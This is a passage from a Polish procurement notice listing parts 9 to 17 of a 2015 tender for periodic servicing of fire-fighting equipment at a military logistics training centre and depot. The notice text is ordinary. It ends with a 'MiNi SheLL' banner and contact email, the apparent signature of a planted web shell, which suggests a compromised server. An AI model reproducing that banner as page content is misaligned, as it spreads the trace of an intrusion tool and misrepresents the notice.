6)wymiana smoczka
7)wymiana paska klinowego
8)sprawdzenie mocowania tarczy tnącej
9)regulacja pracy silnika	
Ilość czynności w roku: raz w roku: sierpień	
Ilość sprzętu ogółem: 8 szt.
 
Sprzęt: przecinarki spalinowych do stali i betonu TS-400 - 5 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:przecinarki spalinowych do stali i betonu TS-800 -3 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ZADANIE NR 9:  Przegląd okresowy autopompy i układu wodno pianowego w samochodach pożarniczych typu: STAR  P142CJ  A24/10, STAR 14.225  A20/10, JELCZ 014 A32/10, Jelcz 010 A32/10, STAR 12.227 Zigler FP 16/8, SCANIA G440 CB 6x6 EHZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 9:  Przegląd okresowy autopompy i układu wodno pianowego w samochodach pożarniczych typu: STAR  P142CJ  A24/10, STAR 14.225  A20/10, JELCZ 014 A32/10, Jelcz 010 A32/10, STAR 12.227 Zigler FP 16/8, SCANIA G440 CB 6x6 EHZ
Nazwa czynności:	
1)sprawdzenie szczelności autopompy
2)przegląd autopompy - smarowanie
3)przegląd skrzyni napędowej autopompy
4)przegląd wału napędowego autopompy
5)przegląd urządzenia zasysającego
6)przegląd zaworu głównego
7)przegląd zaworów tłocznych
8)przegląd manometrów i manowakuometrów
9)sprawdzenie instalacji  elektrycznej i automatyki sterowania autopompy
10)próba sprawności podzespołów wodno-pianowych ,ciśnienia i wydajności autopompy,
11)dokonanie przeglądu  poprawności działania przyrządów pomiarowych	
Ilość czynności w roku: raz w roku: czerwiec	
Ilość sprzętu ogółem: 12 szt.

 Uwaga!  Dodatkowo w pojeździe Scania G440 CB 6x6 EHZ należy dokonać:
- wymiany oleju w trokomacie
- sprawdzenie prawidłowej pracy systemu proszkowego
- sprawdzenie szczelności układu sterowania
- sprawdzenie prawidłowej pracy działka proszkowego (sprawdzenie układu sterowania)

Autopompy i układ wodno pianowy w samochodach pożarniczych typu:		
STAR P142CJ A24/10 - 3 szt.	
STAR 14.225 A20/10 - 1 szt.	
JELCZ 014 A32/10 - 3 szt.	
Jelcz 010 A32/10 -1 szt.	
STAR 12.227 Zigler Fp 16/8 - 3 szt.	
SCANIA G440 CB 6x6 EHZ - 1 szt.	
MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> ZADANIE NR 10:  Przegląd okresowy motopomp pożarniczych M8/8-1 silnik Kohler, M8/8 - PO7, pomp pływających Niagara 1 M4/2, Niagara Plus M4/2, Posejdon M8/2, pompy szlamowej KTH 80X Honda, pomp półszlamowych SST-50.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 10:  Przegląd okresowy motopomp pożarniczych M8/8-1 silnik Kohler, M8/8 - PO7, pomp pływających Niagara 1 M4/2, Niagara Plus M4/2, Posejdon M8/2, pompy szlamowej KTH 80X Honda, pomp półszlamowych SST-50
Nazwa czynności:		
1)sprawdzenie szczelności pompy
2)przegląd elektroniki silnika
3)sprawdzenie regulatora obrotów
4)przegląd pompy jakiej
5)przegląd pompy zasysającej
6)wymiana oleju w regulatorze obrotów
7)sprawdzenie gaźnika
8)wymiana świec zapłonowych
9)wymiana filtra powietrza,
10)dokonanie próby szczelności i ciśnienia
11)przegląd trokomatów
12)wymiana filtra paliwa	
Ilość czynności w roku: raz w roku: czerwiec	
Ilość sprzętu ogółem: 13 szt.

Sprzęt:motopompa pożarnicza M8/8-1 silnik Kohler -1 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:motopompa pożarnicza M8/8 - PO7 - 1 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja
Sprzęt: pompy pływające Niagara 1 M4/2	2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:pompa pływająca Niagara Plus M4/2 - 1 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:pompy pływające Posejdon M8/2 -1 szt.	MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 
- Skład Gardeja
Sprzęt:pompy pływające Posejdon M8/2 - 4 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:pompa szlamowa KTX 80X Honda - 1 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:pompy półszlamowa SST-50 - 2 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZADANIE NR 11: Przegląd okresowy agregatów prądotwórczych GX 200 Honda, ED - 2400  GX 160 Honda, Fogo FH5540, silnik Honda GX270,  GX 240 Honda Geko 4500 ED, G 200 Honda Geko 2500, FOGO FV 5540 X - silnik Briggs Stratton 9HP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 11:  Przegląd okresowy agregatów prądotwórczych GX 200 Honda, ED - 2400  GX 160 Honda, Fogo FH5540, silnik Honda GX270,  GX 240 Honda Geko 4500 ED, G 200 Honda Geko 2500, FOGO FV 5540 X - silnik Briggs Stratton 9HP
Nazwa czynności:		
1)przegląd elektroniki silnika
2)wymiana świec zapłonowych
3)wymiana filtra powietrza
4)wymiana oleju w silniku
5)wymiana filtra oleju
6)sprawdzenie parametrów pracy silnika
7)sprawdzenie parametrów pod obciążeniem (moc max)
8)sprawdzenie zabezpieczenia prądnicy
9)kontrola gniazd wtykowych poboru energii
10)dokonanie przeglądu poprawności działania przyrządów pomiarowych	
Ilość czynności w roku: raz w roku: czerwiec	
Ilość sprzętu ogółem: 10 szt.

Sprzęt: agregaty prądotwórcze GX 200 Honda -	3 szt.	MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
agregat prądotwórczy
Sprzęt: ED - 2400 GX 160 Honda - 1 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt: agregaty prądotwórcze Fogo FH5540, silnik Honda GX270 - 2 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:agregaty prądotwórcze GX 240 Honda Geko 4500 ED - 1 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja
Sprzęt:agregaty prądotwórcze G 200 Honda Geko 2500 - 1 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja
Sprzęt:agregaty prądotwórcze FOGO FV 5540 X - silnik Briggs Stratton 9HP - 2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz 
ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> ZADANIE NR 12: Przegląd okresowy oraz kalibracja mierników gazów wybuchowych SCOTT 096 - 3264.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 12: Przegląd okresowy oraz kalibracja mierników gazów wybuchowych SCOTT 096 - 3264
Nazwa czynności:	przegląd i kalibracja	
Ilość czynności w roku: dwa razy w roku:kwiecień,październik
Ilość sprzętu ogółem: 5 szt.

Sprzęt: mierniki gazów wybuchowych SCOTT 096-3264 - 5 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ZADANIE NR 13:  Przegląd okresowy poduszek niskociśnieniowych Vetter.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 13:   Przegląd okresowy poduszek niskociśnieniowych Vetter
Nazwa czynności:		
1)sprawdzenie szczelności, przegląd reduktorów i sterowników 
2)dokonanie przeglądu  poprawności działania przyrządów pomiarowych	
Ilość czynności w roku: raz w roku: wrzesień	
Ilość zestawów ogółem: 2 zestawy

Sprzęt: Poduszki niskociśnieniowe Vetter - 1 zestaw MIEJSCE WYKONANIA USŁUGI:	Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:Poduszki niskociśnieniowe Vetter - 1 zestaw MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> ZADANIE NR 14:Przegląd okresowy poduszek wysokociśnieniowych Holmatro.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 14:   Przegląd okresowy poduszek wysokociśnieniowych Holmatro
Nazwa czynności:		
1)sprawdzenie szczelności,    
2)przegląd reduktorów i sterowników
3)dokonanie przeglądu poprawności działania przyrządów pomiarowych	
Ilość czynności w roku: raz w roku: wrzesień	
Ilość zestawów ogółem: 4 zestawy

Sprzęt:Poduszki wysokociśnieniowe Holmatro - 4 zestawy MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> ZADANIE NR 15: Przegląd okresowy wentylatorów nadciśnieniowych PH-VP 450.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 15:  Przegląd okresowy wentylatorów nadciśnieniowych PH-VP 450
Nazwa czynności		
1)wymiana oleju
2)wymiana filtrów
3)wymiana świec zapłonowych
4)przegląd zespołów elektroniki	
Ilość czynności w roku: raz w roku: sierpień	
Ilość ogółem: 11 szt.

Sprzęt: Wentylator nadciśnieniowy PH-VP 450 -10 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz 
ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:Wentylator nadciśnieniowy PH-VP 450 - 1 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> ZADANIE NR 16:  Przegląd okresowy Agregatu pompowego 8000/8 na przyczepie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 16:  Przegląd okresowy Agregatu pompowego 8000/8 na przyczepie
Nazwa czynności:		
1)wymiana oleju
2)wymiana filtra paliwa
3)wymiana świec zapłonowych
4)przeprowadzenie próby ciśnieniowej pod kątem  szczelności	
Ilość czynności w roku: raz w roku: wrześniu	
Ilość ogółem: 1 szt.

Sprzęt: Agregatu pompowego 8000/8 na przyczepie - 1 szt.	 MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> ZADANIE NR 17: Przegląd okresowy motopomp pożarniczych TOHATSU M8/8,TOHATSU VC 72 AS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 17: Przegląd okresowy motopomp pożarniczych TOHATSU M8/8,TOHATSU VC 72 AS
Nazwa czynności:		
1)sprawdzenie szczelności pompy
2)przegląd elektroniki silnika
3)sprawdzenie regulatora obrotów
4)przegląd pompy 
5)przegląd pompy zasysającej
6)wymiana oleju w regulatorze obrotów
7)sprawdzenie gaźnika
8)wymiana świec zapłonowych
9)wymiana filtra powietrza
10)dokonanie próby szczelności i ciśnienia
11)przegląd  trokomatów
12)wymiana filtra paliwa	
Ilość czynności w roku: raz w roku: październik	
Ilość ogółem - 14 szt.

Sprzęt: motopompy pożarnicze TOHATSU M8/8 - 2 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:motopompy pożarnicze TOHATSU VC 72 AS - 12 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com